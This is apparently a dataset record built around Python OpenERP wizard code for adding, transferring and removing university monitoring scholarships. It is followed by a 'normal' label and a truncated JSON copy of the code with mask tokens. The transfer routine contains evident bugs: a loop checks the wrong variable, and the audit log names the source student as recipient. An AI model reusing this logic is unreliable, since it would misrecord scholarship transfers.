res["value"]= {"disciplina_id": False}
return res
def onchange_disciplina(self, cr, uid, ids, disciplina_id, doc_discente_id, context=None):
if disciplina_id:
if doc_discente_id:
doc_discente = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, doc_discente_id, context)
doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False
disciplina_id = self.pool.get("ud.monitoria.disciplina").browse(cr, uid, disciplina_id, context)
return {
"value": {"doc_discente_id": doc_discente_id,
"bolsas": disciplina_id.bolsas}
}
return {"value": {"doc_discente_id": False, "bolsas": 0}}
def onchange_doc_discente(self, cr, uid, ids, doc_discente_id, dados_bancarios_id, context=None):
if doc_discente_id:
doc = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, doc_discente_id, context)
if not dados_bancarios_id:
dados_bancarios_id = getattr(doc.dados_bancarios_id, "id", False)
return {"value": {"dados_bancarios_id": dados_bancarios_id},
"domain": {"dados_bancarios_id": [("ud_conta_id", "=", doc.discente_id.id)]}}
return {"value": {"dados_bancarios_id": False},
"domain": {"dados_bancarios_id": [("id", "=", False)]}}
def onchange_banco(self, cr, uid, ids, banco_id, context=None):
if banco_id:
banco = self.pool.get("ud.banco").read(cr, uid, banco_id, [
"agencia", "dv_agencia", "conta", "dv_conta", "operacao"
], context=context, load="_classic_write")
vals = {"agencia": False, "dv_agencia": False, "conta": False, "dv_conta": False, "operacao": False}
vals.update({"%s_v" % dado: banco.get(dado) for dado in banco.keys()})
return {"value": vals}
return {"value": {"agencia_v": False, "dv_agencia_v": False, "conta_v": False, "dv_conta_v": False,"operacao_v": False,
"agencia": False, "dv_agencia": False, "conta": False, "dv_conta": False, "operacao": False}}
def botao_adicionar(self, cr, uid, ids, context=None):
perfil_model = self.pool.get("ud.perfil")
for add in self.browse(cr, uid, ids, context):
if add.bolsas == 0:
raise osv.except_osv(u"Bolsas Insuficientes", u"Não há bolsas disponíveis para essa disciplina")
elif not add.doc_discente_id.is_active:
raise osv.except_osv(u"Documento do discente inativo",
u"O discente não pode ser classificado como bolsista")
if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:
raise osv.except_osv(
u"Discente bolsista",
u"O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"".format(
add.doc_discente_id.discente_id.name, add.doc_discente_id.inscricao_id.perfil_id.matricula,
TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.tipo_bolsa]
)
)
responsavel = self.pool.get("ud.employee").search(cr, SUPERUSER_ID, [("user_id", "=", uid)], limit=2)
if not responsavel:
raise osv.except_osv(
u"Registro Inexistente",
u"Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo"
)
if len(responsavel) > 1:
raise osv.except_osv(
u"Multiplos vínculos",
u"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo"
)
perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.inscricao_id.perfil_id.id, {
"is_bolsista": True, "tipo_bolsa": "m", "valor_bolsa": ("%.2f" % add.valor_bolsa).replace(".", ",")
})
if not add.dados_bancarios_id:
dados_bancarios = get_banco(self, cr, add, add.doc_discente_id.discente_id.id, context)
else:
dados_bancarios = add.dados_bancarios_id.id
add.doc_discente_id.write({"state": "bolsista", "dados_bancarios_id": dados_bancarios})
evento = {
"responsavel_id": responsavel[0],
"name": u"Adição de bolsa: \"%s\"" % add.doc_discente_id.discente_id.name,
"envolvidos_ids": [(4, add.doc_discente_id.discente_id.id)],
"descricao": u"Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\"." % (
("%.2f" % add.valor_bolsa).replace(".", ","),
add.doc_discente_id.discente_id.name.upper(), add.doc_discente_id.inscricao_id.perfil_id.matricula
)
}
add.semestre_id.write({"eventos_ids": [(0, 0, evento)]})
return True
class TransferirBolsaWizard(osv.TransientModel):
_name = "ud.monitoria.bolsa.transferir.wizard"
_description = u"Transferência de bolsa de monitoria (UD)"
_STATES = [
("n_bolsista", u"Não Bolsista"),
("reserva", u"Cadastro de Reserva"),
]
_columns = {
"semestre_id": fields.many2one("ud.monitoria.registro", u"Semestre", required=True, readonly=True),
"curso_id_de": fields.many2one("ud.curso", u"Curso", required=True, domain="[('is_active', '=', True)]"),
"disciplina_id_de": fields.many2one("ud.monitoria.disciplina", u"Disciplinas", required=True,
domain="[('id', '=', False)]"),
"tutor_de": fields.boolean(u"Tutor?"),
"doc_discente_id_de": fields.many2one("ud.monitoria.documentos.discente", u"Discente", required=True,
domain="[('is_active', '=', True), ('state', '=', 'bolsista'), "
"('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]"),
"curso_id_para": fields.many2one("ud.curso", u"Curso", required=True, domain="[('is_active', '=', True)]"),
"disciplina_id_para": fields.many2one("ud.monitoria.disciplina", u"Disciplinas", required=True,
domain="[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), "
"('is_active', '=', True)]"),
"tutor_para": fields.boolean(u"Tutor?"),
"status_para": fields.selection(_STATES, u"Status", required=True),
"doc_discente_id_para": fields.many2one("ud.monitoria.documentos.discente", u"Discente", required=True,
domain="[('is_active', '=', True), ('state', '=', status_para), "
"('disciplina_id', '=', disciplina_id_para), "
"('tutor', '=', tutor_para)]"),
# DADOS BANCÁRIOS
"banco_id": fields.many2one("ud.banco", u"Banco", ondelete="restrict"),
"agencia": fields.char(u"Agência", size=4, help=u"Número da Agência"),
"dv_agencia": fields.char(u"DV Agência", size=2, help=u"Dígito verificador da Agência"),
"conta": fields.char(u"Conta", size=10, help=u"Número da Conta"),
"dv_conta": fields.char(u"DV Conta", size=1, help=u"Dígito verificador da Conta"),
"operacao": fields.char(u"Operação", size=3, help=u"Tipo de conta"),
"agencia_v": fields.related("banco_id", "agencia", type="boolean", invisible=True, readonly=True),
"dv_agencia_v": fields.related("banco_id", "dv_agencia", type="boolean", invisible=True, readonly=True),
"conta_v": fields.related("banco_id", "conta", type="boolean", invisible=True, readonly=True),
"dv_conta_v": fields.related("banco_id", "dv_conta", type="boolean", invisible=True, readonly=True),
"operacao_v": fields.related("banco_id", "operacao", type="boolean", invisible=True, readonly=True),
}
def default_get(self, cr, uid, fields_list, context=None):
res = super(TransferirBolsaWizard, self).default_get(cr, uid, fields_list, context)
context = context or {}
if context.get("active_id", False):
if context.get("active_model", False) == "ud.monitoria.registro":
res["semestre_id"] = context.get("active_id")
elif context.get("active_model", False) == "ud.monitoria.documentos.discente":
doc = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, context.get("active_id"),
context)
if doc.state != "bolsista":
raise osv.except_osv(u"Discente bolsista", u"O discente já é bolsista")
elif not doc.is_active:
raise osv.except_osv(u"Documento do discente inativo",
u"O discente não pode ser classificado como bolsista")
res["semestre_id"] = doc.disciplina_id.semestre_id.id
res["curso_id_de"] = doc.disciplina_id.curso_id.id
res["disciplina_id_de"] = doc.disciplina_id.id
res["tutor_de"] = doc.tutor
res["status_de"] = doc.state
res["doc_discente_id_de"] = doc.id
return res
def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id, disciplina_id, context=None):
if not (semestre_id and curso_id):
return {"value": {"disciplina_id_" + comp: False}}
reg = self.pool.get("ud.monitoria.registro").read(cr, uid, semestre_id, ["processos_seletivos_ids"], context=context, load="_classic_write")
args = [("curso_id", "=", curso_id), ("processo_seletivo_id", "=", reg["processos_seletivos_ids"]), ("is_active", "=", True)]
disc = self.pool.get("ud.monitoria.disciplina").search(cr, uid, args, context=context)
res = {"domain": {"disciplina_id_" + comp: [("id", "in", disc)]}}
if not disc:
res["value"] = {"disciplina_id_" + comp: False}
return res
def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id, doc_discente_id, context=None):
if disciplina_id and doc_discente_id:
doc_discente = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, doc_discente_id, context)
doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False
return {
"value": {"doc_discente_id_" + comp: doc_discente_id}
}
return {"value": {"doc_discente_id_" + comp: False}}
def onchange_banco(self, cr, uid, ids, banco_id, context=None):
if banco_id:
banco = self.pool.get("ud.banco").read(cr, uid, banco_id, [
"agencia", "dv_agencia", "conta", "dv_conta", "operacao"
], context=context, load="_classic_write")
vals = {"agencia": False, "dv_agencia": False, "conta": False, "dv_conta": False, "operacao": False}
vals.update({"%s_v" % dado: banco.get(dado) for dado in banco.keys()})
return {"value": vals}
return {"value": {"agencia_v": False, "dv_agencia_v": False, "conta_v": False, "dv_conta_v": False,"operacao_v": False,
"agencia": False, "dv_agencia": False, "conta": False, "dv_conta": False, "operacao": False}}
def botao_transferir(self, cr, uid, ids, context=None):
perfil_model = self.pool.get("ud.perfil")
for transf in self.browse(cr, uid, ids, context):
matricula = transf.doc_discente_id_para.discente_id.matricula
for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:
if perfil.matricula == matricula and perfil.tipo == "a":
if perfil.is_bolsista:
raise osv.except_osv(
u"Discente bolsista",
u"O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"".format(
transf.doc_discente_id_para.discente_id.pessoa_id.name, matricula,
TIPOS_BOLSA[perfil.tipo_bolsa]
)
)
break
if not perfil:
raise osv.except_osv(
u"Perfil excluído",
u"O perfil do discente para a matrícula \"%s\" não existe ou foi excluído" % matricula or ""
)
matricula = transf.doc_discente_id_de.discente_id.matricula
for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:
if perfil.matricula == matricula and perfil.tipo == "a":
break
responsavel = self.pool.get("ud.employee").search(cr, SUPERUSER_ID, [("user_id", "=", uid)], limit=2)
if not responsavel:
raise osv.except_osv(
u"Registro Inexistente",
u"Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo"
)
if len(responsavel) > 1:
raise osv.except_osv(
u"Multiplos vínculos",
u"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo"
)
valor = perfil_de.valor_bolsa
perfil_model.write(cr, SUPERUSER_ID, perfil.id, {
"is_bolsista": True, "tipo_bolsa": "m", "valor_bolsa": valor
})
perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {
"is_bolsista": False, "tipo_bolsa": False, "valor_bolsa": False
})
transf.doc_discente_id_de.write({"state": "n_bolsista"})
transf.doc_discente_id_para.write({"state": "bolsista", "is_active": True})
get_banco(self, cr, transf, transf.doc_discente_id_para.discente_id.pessoa_id.id, context)
evento = {
"responsavel_id": responsavel[0],
"name": u"Transferência de bolsa",
"envolvidos_ids": [(4, transf.doc_discente_id_de.discente_id.pessoa_id.id),
(4, transf.doc_discente_id_para.discente_id.pessoa_id.id)],
"descricao": u"Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula "
u"%(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula"
u"\"%(matricula_para)s\"." % {
"valor": valor, "discente_de": transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(),
"matricula_de": perfil_de.matricula,
"discente_para": transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(),
"matricula_para": perfil_de.matricula
}
}
transf.semestre_id.write({"eventos_ids": [(0, 0, evento)]})
return True
class RemoverBolsaWizard(osv.TransientModel):
_name = "ud.monitoria.bolsa.remover.wizard"
_description = u"Remoção de bolsa de discente"
_columns = {
"semestre_id": fields.many2one("ud.monitoria.registro", u"Semestre", required=True, readonly=True),
"curso_id": fields.many2one("ud.curso", u"Curso", required=True, domain="[('is_active', '=', True)]"),
"disciplina_id": fields.many2one("ud.monitoria.disciplina", u"Disciplinas", required=True,
domain="[('id', '=', False)]"),
"tutor": fields.boolean(u"Tutor?"),
"doc_discente_id": fields.many2one("ud.monitoria.documentos.discente", u"Discente", required=True,
domain="[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), "
"('is_active', '=', True), ('state', '=', 'bolsista')]"),
}
def default_get(self, cr, uid, fields_list, context=None):
res = super(RemoverBolsaWizard, self).default_get(cr, uid, fields_list, context)
context = context or {}
if context.get("active_id", False):
if context.get("active_model", False) == "ud.monitoria.registro":
res["semestre_id"] = context.get("active_id")
elif context.get("active_model", False) == "ud.monitoria.documentos.discente":
doc = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, context.get("active_id"), context)
if doc.state != "bolsista":
raise osv.except_osv(u"Discente não bolsista", u"O discente não é bolsista")
elif not doc.is_active:
raise osv.except_osv(u"Documento do discente inativo",
u"Não é possível alterar o status de discentes inativos")
res["semestre_id"] = doc.disciplina_id.semestre_id.id
res["curso_id"] = doc.disciplina_id.curso_id.id
res["disciplina_id"] = doc.disciplina_id.id
res["tutor"] = doc.tutor
res["doc_discente_id"] = doc.id
return res
def onchange_curso(self, cr, uid, ids, semestre_id, curso_id, disciplina_id, context=None):
if not (semestre_id and curso_id):
return {"value": {"disciplina_id": False}}
reg = self.pool.get("ud.monitoria.registro").read(cr, uid, semestre_id, ["processos_seletivos_ids"], context=context, load="_classic_write")
args = [("curso_id", "=", curso_id), ("processo_seletivo_id", "=", reg["processos_seletivos_ids"]), ("is_active", "=", True)]
disc = self.pool.get("ud.monitoria.disciplina").search(cr, uid, args, context=context)
res = {"domain": {"disciplina_id": [("id", "in", disc)]}}
if not disc:
res["value"] = {"disciplina_id": False}
return res
def onchange_disciplina(self, cr, uid, ids, disciplina_id, doc_discente_id, context=None):
if disciplina_id and doc_discente_id:
doc_discente = self.pool.get("ud.monitoria.documentos.discente").browse(cr, uid, doc_discente_id, context)
doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False
return {
"value": {"doc_discente_id": doc_discente_id}
}
return {"value": {"doc_discente_id": False}}
def botao_remover(self, cr, uid, ids, context=None):
perfil_model = self.pool.get("ud.perfil")
pessoa_model = self.pool.get("ud.employee")
for rem in self.browse(cr, uid, ids, context):
responsavel = pessoa_model.search(cr, SUPERUSER_ID, [("user_id", "=", uid)], limit=2)
if not responsavel:
raise osv.except_osv(
u"Registro Inexistente",
u"Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo"
)
if len(responsavel) > 1:
raise osv.except_osv(
u"Multiplos vínculos",
u"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo"
)
perfil = rem.doc_discente_id.inscricao_id.perfil_id
perfil_model.write(cr, SUPERUSER_ID, perfil.id, {
"is_bolsista": False, "tipo_bolsa": False, "valor_bolsa": False
})
rem.doc_discente_id.write({"state": "n_bolsista"})
evento = {
"responsavel_id": responsavel[0],
"name": u"Remoção de bolsa: \"%s\"" % rem.doc_discente_id.discente_id.name,
"envolvidos_ids": [(4, rem.doc_discente_id.discente_id.id)],
"descricao": u"A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida." % (
rem.doc_discente_id.discente_id.name.upper(), perfil.matricula
)
}
rem.semestre_id.write({"eventos_ids": [(0, 0, evento)]})
return True
|
normal
|
{
"blob_id": "fd877f5952c1fc0b2115d0950a066501ee7545f8",
"index": 4150,
"step-1": "<mask token>\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n <mask token>\n <mask token>\n <mask token>\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get('ud.monitoria.oferta.disciplina')\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n <mask token>\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n res['status'] = 'n_bolsista'\n res['valor_bolsa'] = 400.0\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state == 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['status'] = doc.state\n res['doc_discente_id'] = doc.id\n return res\n <mask token>\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n disciplina_id = self.pool.get('ud.monitoria.disciplina').browse(cr,\n uid, disciplina_id, context)\n return {'value': {'doc_discente_id': doc_discente_id, 'bolsas':\n disciplina_id.bolsas}}\n return {'value': {'doc_discente_id': False, 'bolsas': 0}}\n <mask token>\n <mask token>\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u'Bolsas Insuficientes',\n u'Não há bolsas disponíveis para essa disciplina')\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(add.doc_discente_id.discente_id.name, add.\n doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.\n tipo_bolsa]))\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.\n inscricao_id.perfil_id.id, {'is_bolsista': True,\n 'tipo_bolsa': 'm', 'valor_bolsa': ('%.2f' % add.valor_bolsa\n ).replace('.', ',')})\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.\n doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({'state': 'bolsista',\n 'dados_bancarios_id': dados_bancarios})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Adição de bolsa: \"%s\"' % add.doc_discente_id.discente_id.\n name, 'envolvidos_ids': [(4, add.doc_discente_id.\n discente_id.id)], 'descricao': \n u'Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\".'\n % (('%.2f' % add.valor_bolsa).replace('.', ','), add.\n doc_discente_id.discente_id.name.upper(), add.\n doc_discente_id.inscricao_id.perfil_id.matricula)}\n add.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.transferir.wizard'\n _description = u'Transferência de bolsa de monitoria (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id_de': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id_de': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor_de': fields.boolean(u'Tutor?'),\n 'doc_discente_id_de': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', 'bolsista'), ('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"\n ), 'curso_id_para': fields.many2one('ud.curso', u'Curso', required=\n True, domain=\"[('is_active', '=', True)]\"), 'disciplina_id_para':\n fields.many2one('ud.monitoria.disciplina', u'Disciplinas', required\n =True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), ('is_active', '=', True)]\"\n ), 'tutor_para': fields.boolean(u'Tutor?'), 'status_para': fields.\n selection(_STATES, u'Status', required=True),\n 'doc_discente_id_para': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', status_para), ('disciplina_id', '=', disciplina_id_para), ('tutor', '=', tutor_para)]\"\n ), 'banco_id': fields.many2one('ud.banco', u'Banco', ondelete=\n 'restrict'), 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id_de'] = doc.disciplina_id.curso_id.id\n res['disciplina_id_de'] = doc.disciplina_id.id\n res['tutor_de'] = doc.tutor\n res['status_de'] = doc.state\n res['doc_discente_id_de'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {('disciplina_id_' + comp): False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {('disciplina_id_' + comp): [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {('disciplina_id_' + comp): False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {('doc_discente_id_' + comp): doc_discente_id}}\n return {'value': {('doc_discente_id_' + comp): False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_transferir(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for transf in self.browse(cr, uid, ids, context):\n matricula = transf.doc_discente_id_para.discente_id.matricula\n for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n if perfil.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(transf.doc_discente_id_para.discente_id\n .pessoa_id.name, matricula, TIPOS_BOLSA[perfil.\n tipo_bolsa]))\n break\n if not perfil:\n raise osv.except_osv(u'Perfil excluído', \n u'O perfil do discente para a matrícula \"%s\" não existe ou foi excluído'\n % matricula or '')\n matricula = transf.doc_discente_id_de.discente_id.matricula\n for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n break\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n valor = perfil_de.valor_bolsa\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n True, 'tipo_bolsa': 'm', 'valor_bolsa': valor})\n perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n 'is_bolsista': False, 'tipo_bolsa': False, 'valor_bolsa': \n False})\n transf.doc_discente_id_de.write({'state': 'n_bolsista'})\n transf.doc_discente_id_para.write({'state': 'bolsista',\n 'is_active': True})\n get_banco(self, cr, transf, transf.doc_discente_id_para.\n discente_id.pessoa_id.id, context)\n evento = {'responsavel_id': responsavel[0], 'name':\n u'Transferência de bolsa', 'envolvidos_ids': [(4, transf.\n doc_discente_id_de.discente_id.pessoa_id.id), (4, transf.\n doc_discente_id_para.discente_id.pessoa_id.id)],\n 'descricao': \n u'Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula %(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula\"%(matricula_para)s\".'\n % {'valor': valor, 'discente_de': transf.\n doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n 'matricula_de': perfil_de.matricula, 'discente_para':\n transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(\n ), 'matricula_para': perfil_de.matricula}}\n transf.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.remover.wizard'\n _description = u'Remoção de bolsa de discente'\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor': fields.boolean(u'Tutor?'),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', 'bolsista')]\"\n )}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(RemoverBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente não bolsista',\n u'O discente não é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {'doc_discente_id': 